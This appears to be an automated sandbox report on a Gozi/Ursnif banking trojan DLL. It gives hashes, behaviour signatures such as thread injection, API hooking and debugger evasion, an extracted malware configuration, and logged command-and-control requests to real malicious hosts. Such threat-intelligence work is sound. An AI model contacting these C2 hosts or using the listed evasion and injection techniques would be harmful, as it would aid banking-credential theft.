Analysis Report SecuriteInfo.com.BScope.TrojanBanker.IcedID.13045

Overview

General Information

Sample Name: SecuriteInfo.com.BScope.TrojanBanker.IcedID.13045 (renamed file extension from 13045 to dll)
Analysis ID: 355490
MD5: a98649743626d197b440755061b1aac3
SHA1: 8033ebd201645f713fb4ad48bf92e5da26bc8216
SHA256: f30b3f53f613d953680fdde8faf35c96a25a1136d0dd6c7aab1cc14ee908702c
Tags: Gozi

Detection

Gozi Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected Gozi e-Banking trojan
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected Ursnif
Allocates memory in foreign processes
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Suspicious powershell command line found
Writes registry values via WMI
Writes to foreign memory regions
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://c56.lepini.at/jvassets/xI/t64.datings Avira URL Cloud: Label: phishing
Found malware configuration
Source: rundll32.exe.4880.1.memstr Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250180", "uptime": "181", "system": "8c34453f67a8cfe0dea5c01f31a0c919hh-", "size": "202820", "crc": "2", "action": "00000000", "id": "2200", "time": "1613790327", "user": "f73be0088695dc15e71ab15cc8e7488a", "hash": "0xf751eb91", "soft": "3"}
Multi AV Scanner detection for domain / URL
Source: c56.lepini.at Virustotal: Detection: 8%
Source: api3.lepini.at Virustotal: Detection: 10%
Source: api10.laptok.at Virustotal: Detection: 10%
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll Virustotal: Detection: 21%

Compliance:

Uses 32bit PE files
Source: SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Binary contains paths to debug symbols
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000020.00000002.440174527.0000025637660000.00000002.00000001.sdmp, csc.exe, 00000022.00000002.449830180.000002835CB50000.00000002.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000024.00000000.480563169.0000000006560000.00000002.00000001.sdmp
Source: Binary string: ntdll.pdb source: rundll32.exe, 00000001.00000003.464838911.0000000006880000.00000004.00000001.sdmp
Source: Binary string: c:\FatSchool\syllableLetter\HuntMouth\ResultMount\Metal.pdb source: loaddll32.exe, 00000000.00000002.474041669.000000006E4F4000.00000002.00020000.sdmp, SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll
Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000001.00000003.464838911.0000000006880000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdb source: control.exe, 00000025.00000002.475364095.00000234DE54C000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbGCTL source: control.exe, 00000025.00000002.475364095.00000234DE54C000.00000004.00000040.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000024.00000000.480563169.0000000006560000.00000002.00000001.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_032E3512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 1_2_032E3512
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06004CF1 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 1_2_06004CF1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06015518 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 1_2_06015518
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0600834C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 1_2_0600834C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0600B88D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 1_2_0600B88D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_060016E1 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 1_2_060016E1

Networking:

HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: c56.lepini.at
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: GOOGLE-AS-APGoogleAsiaPacificPteLtdSG
Source: global traffic HTTP traffic detected: GET /api1/lRuXDeqB_2Bc/XvlsjNkb12o/gwuZFBZ1reBnRN/MwDD30RutxcHLukN9rpn9/npm0S1bymAWDLwAq/sSrh6nrcB30L_2F/izKhwPXgoMPbDw8AwI/bcxbPx_2F/sPE_2F9KStlAhqTF4V5b/y4C6N5Yt6P6BPPOxWQU/OGLJLzSobh_2B0sjZCp_2F/DrvPoP9aSd0Pf/rb0_2BEP/NEaBXrAH5a59GVRi35npZ2u/2HVSB5mOu5/GjNc1aS2g_2Friv0u/PdviQBpuxewp/654QJEVjE1l/tqM_2FQyyccPpl/OvxU5bjYeNf_2FSFZWNT_/2BXxJQTeWkl/B26Z HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: api10.laptok.at Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/52JoIUxZl8uL8g/Jlv9SsgDyw540Wq6LwGS5/Akl7wfo7sQpZNdRY/cjXr0_2FffzKq5M/LLRxJgTq1LatxpQ4rq/e_2Fc6vld/dlUg3_2FZQ0ehGT4So8G/fMy2GT6nt6deO5e25_2/Ff0JiPPfiqmM34f5OWLQvg/KYp9KrJh0r67L/pn5QNIOf/kMWRvPMFc9r9kXODRg1ulU2/z7odHXGBMR/lYfmaULcgNQgPx4am/cS2bXQrCZF_2/B23CtBYMqES/4DTxnAolsdVLPO/ddtMaT_2FHc7z3PMSjVwg/UA6RKmWTWJJFW3tn/HIFqSc0CgE9Oz8U/RMsU3xQiPj/0lNR7s2U HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/mJcu4ZpSHvJcxs/gTaeMeLA_2FWkDrPos3yv/o_2FkT7lhbTkz94i/fBpDzU1tcyY6OmN/wh_2Fqsq0x_2BVcyRu/hKNYQUf5c/2_2FFXvnTSY3WFoMID9n/_2F6Bbwi_2B4k052_2B/Wr5N3KWbYMdVd6GR_2BEd6/frQD5QyUG4NTH/KCXhDtaI/LQzs7_2BhqKT7yFro_2FbyT/VIlUFlqLO5/zPoVUlcpnwFahHZhS/NgHMqvKCx6Md/QpmRmASOulk/3KXyMSMLXtwHJ0/Ayj0bGv0dcW2jNr68db4N/OxsA4fzXWiBGnk2x/RKSr4_2F7Vbgdhx/3Qe5dCnv674qW96yc4/mbzhfuMNA/DIB HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/KdItNYP92K_2BGFJRG/FCes9fXP6/EKH8rknsTZpgqZdJldqw/3b9dm14MUM_2B8EMGSI/7pfw2RywZcbIKG9NkPZ6rU/L_2F1iZVmuA8I/bZCf7wPT/59CIAbsuvFsGBr_2ByvNsJY/_2F8CnY_2F/Qz4L32M090vQj6JXa/h6No_2BwGiDr/i_2BcbOUuIA/99cCf3a5n6QYR9/qLuOWT5N_2FpMeyoZyiR_/2BPh75eFbRwqS7wb/9mmFbiL_2BjLH_2/Bw0aMox3zZYN8BrWji/d0ul9u66b/5Ar2TaNyvuxbIv_2FbJO/iZdpEvv6dL67JT4JuHG/CIG3_2B0w/ezBI HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 Host: api3.lepini.at
Source: global traffic HTTP traffic detected: GET /api1/vWkJGuJE0Ypz4ELElXNYpx/ievwRvWRp6AtE/FLqmCUzt/5uo9iTuyNQHW_2Bgl72Mtoc/OJjks7D84c/jUQzCvj9HAvA4_2Fn/0IgtjZWkkpM9/mugU4KqOZpX/ELHTOesIuFyu2R/fPF1D_2FKLK8pIgLUPJ8b/MsAkkR2vVU550mz4/2xNIT9yeFYP0SH8/QCAO7xgxjSKhjDwWSu/d4RDhkHVo/swuiJsofHs6pC25dK6l3/HzIzoU7jbR0_2FxK9PH/dXkkvhT3hIXDJCOq2yuAle/hm5AJy_2FYrqX/EHbCXHlP/QMEn6CeIiMAtfbE_2BItId6/8cRyHuVByX/s_2FZEQQg/t HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/Nwf1NrCXPxFirOr0/uMxCmKw0yJ8Me4y/orydykHO8XvuJC2OYB/s7Uq9EcWB/rEU1Bs_2FE38t41ILq_2/BLnFpSQmWR07RbE9l3_/2F7qFMxOvjfOZ3Wk5kh8d_/2FSq1zGohLPY7/rV1YYz1u/bg5hb76H1d9lPRJ2QkA7rOK/CzjsM_2Bpl/4Tr8l66uq_2F0z5aY/B6OoutaRjYCr/vft5NoB1Vtt/gZ1VtWrzMHi7Qd/_2FJa1O_2B51q_2Fi9e0F/9zlCZ_2Fg1KAymcn/ZnA4yi7CxnTLTPI/Xusdx3Oaio4z6sFjkd/Hl0nRXuIj/kLcz6KJ9ikRLyD1DMiLc/55hUFdugyYd/ehM HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/b_2BsRZ0V3/9XA_2FQDJiqIrvxT_/2Bzr5nCmqGSK/ShqTR3djQTg/9okoIzbrA45DgN/9_2BnAmX4aa3sOT_2Fjtg/wGfQ9GmpK7SG_2FZ/Jm_2Bu2uDtvBBiy/YdPpa1IDFr0YVFiCIU/9kpIGh2av/Hp7TJNKAwdyzbdIX2lq0/_2FLAYbWp0p17KILF16/gSpFWzNIu2P1GhKVwKLBMS/JBNwDitSRAHK2/4FJoV5D8/N70d4vmik_2BJY6NS2Abb4g/od_2FcoJz_/2BCjrYc2TYSJ6kyyC/h8EY_2Bk0tWz/YrJjDZ2_2Bq/x6uK3S6lfJQGsn/0gdeblP7aJv/qe HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/MAC288CXvx/CqE_2FjFttZgFxzTr/MiARq1YU3Ozj/cO5nvYd1QZ1/9pP5tjMqhWzKxQ/4Fo_2FlvUMfZR_2B6lME7/5rcSbRaprs2L63pj/ODg2Z6FLC7qglee/4_2Fk4pRcK6CoYb5H6/4ED5a34fC/FOE8o4kQepcFxnvsdyvs/5oUTPwL2esoyhQYMEtl/0473GEiPK1QvkIo4bwkLYq/JhStBUtEP6iki/nGPvtQkv/kuGeGooyGp9BZWCtnT06knF/ZgoZr_2F5L/6SdySCav5X7udnSBS/_2F_2B8xtq_2/BGO6I65Acz9/Ko7NuIbnR/Immw_2BnO/I HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 Host: api3.lepini.at
Source: global traffic HTTP traffic detected: GET /api1/QsdQ9bwnxSOH1/x55zfc3o/j8BfIHUCdwyUtYZFgBqFl8X/_2BFwtf_2F/QdLOKZB9TNZsN7wvI/vobkXML_2B8c/sYZxphtC1aK/FLvOclZiXjQYOG/x5IaE7pOnih7q_2BrqmEb/egNoiSna00Kb6meB/wCzvKPOaVph51X8/xUkuRKEycofy4z_2Bl/5ilyf6ti8/f3G6tY3BMx_2BC48fFfc/OMRrOfQP_2FoyZv3x5c/mBeNmAfD4fjZh3wiudEAuV/MfCWeHQQB11zh/ND3yzaR1/SNDEufrq_2FC3x6B7XUhRUl/mw4VFuO8kI0ykyRa6MM/y41I HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 Host: api3.lepini.at
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: unknown DNS traffic detected: queries for: api10.laptok.at
Source: unknown HTTP traffic detected: POST /api1/7l8Dzjsp1/mXsJaM5_2F8Vehw_2BWy/W2IjJ85rxt75hrAokHG/TJ0QxGdBxL3u8DIp94_2BF/9KwvYHm_2BYSs/BfajRvyD/2MOW_2BQiedgr_2Fd8hxOAg/4ITYhYiB2o/YxcRWa76OaPgbHiid/oLaZ6rVxKHz9/_2B0DP9hiSI/LwZPk_2FktvyHp/45tIfIOgi7g5V2ypH5k4K/BaUY8Ny1I4ubY51x/HVluRDHgx9QZrYK/A8s3_2BcDuftJ4p3cS/pxjey9cHz/IRMztldXNqbinunnNW7T/V01D57bubow_2FdlHkl/Kzth8j0U_2FloaabiqRg_2/B_2Bb2W HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 Content-Length: 2 Host: api3.lepini.at
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 19 Feb 2021 18:05:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: explorer.exe, 00000024.00000000.477235518.0000000006100000.00000002.00000001.sdmp String found in binary or memory: http://%s.com
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: {785970B2-7328-11EB-90E4-ECF4BB862DED}.dat.21.dr String found in binary or memory: http://api10.laptok.at/api1/52JoIUxZl8uL8g/Jlv9SsgDyw540Wq6LwGS5/Akl7wfo7sQpZNdRY/cjXr0_2FffzKq5M/LL
Source: {785970B0-7328-11EB-90E4-ECF4BB862DED}.dat.21.dr, ~DF4A349C0270E318E7.TMP.21.dr String found in binary or memory: http://api10.laptok.at/api1/lRuXDeqB_2Bc/XvlsjNkb12o/gwuZFBZ1reBnRN/MwDD30RutxcHLukN9rpn9/npm0S1bymA
Source: loaddll32.exe, 00000000.00000002.473604486.0000000001600000.00000002.00000001.sdmp, explorer.exe, 00000024.00000000.458041713.0000000001980000.00000002.00000001.sdmp, control.exe, 00000025.00000002.473939310.00000234DCB90000.00000002.00000001.sdmp String found in binary or memory: http://api10.laptok.at/api1/mJcu4ZpSHvJcxs/gTaeMeLA_2FWkDrPos3yv/o_2FkT7lhbTkz94i/fBpDzU1tcyY6O
Source: {785970B4-7328-11EB-90E4-ECF4BB862DED}.dat.21.dr, ~DFB35D4E79E851C9A1.TMP.21.dr String found in binary or memory: http://api10.laptok.at/api1/mJcu4ZpSHvJcxs/gTaeMeLA_2FWkDrPos3yv/o_2FkT7lhbTkz94i/fBpDzU1tcyY6OmN/wh
Source: explorer.exe, 00000024.00000002.504777682.0000000005603000.00000004.00000001.sdmp String found in binary or memory: http://api10.laptok.at/api1/vWkJGuJE0Ypz4ELElXNYpx/ievwRvWRp6AtE/FLqmCUzt/5uo9iTuyNQHW_2Bgl72Mtoc/OJ
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.477235518.0000000006100000.00000002.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000024.00000002.494453261.0000000001464000.00000004.00000020.sdmp String found in binary or memory: http://c56.lepini.at/e3
Source: explorer.exe, 00000024.00000002.494453261.0000000001464000.00000004.00000020.sdmp, explorer.exe, 00000024.00000000.486779764.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://c56.lepini.at/jvassets/xI/t64.dat
Source: explorer.exe, 00000024.00000000.486779764.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://c56.lepini.at/jvassets/xI/t64.datings
Source: explorer.exe, 00000024.00000002.494453261.0000000001464000.00000004.00000020.sdmp String found in binary or memory: http://c56.lepini.at/l
Source: explorer.exe, 00000024.00000000.487000468.00000000089C7000.00000004.00000001.sdmp String found in binary or memory: http://c56.lepini.at:80/jvassets/xI/t64.dat:
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: rundll32.exe, powershell.exe, 0000001C.00000003.454320398.00000221ED090000.00000004.00000001.sdmp, explorer.exe, 00000024.00000000.479277351.00000000062EE000.00000004.00000001.sdmp, control.exe, 00000025.00000002.470708873.000000000051E000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: rundll32.exe, 00000001.00000002.483192314.0000000006000000.00000040.00000001.sdmp, powershell.exe, 0000001C.00000003.454320398.00000221ED090000.00000004.00000001.sdmp, explorer.exe, 00000024.00000000.479277351.00000000062EE000.00000004.00000001.sdmp, control.exe, 00000025.00000002.470708873.000000000051E000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000024.00000000.488894525.000000000F540000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
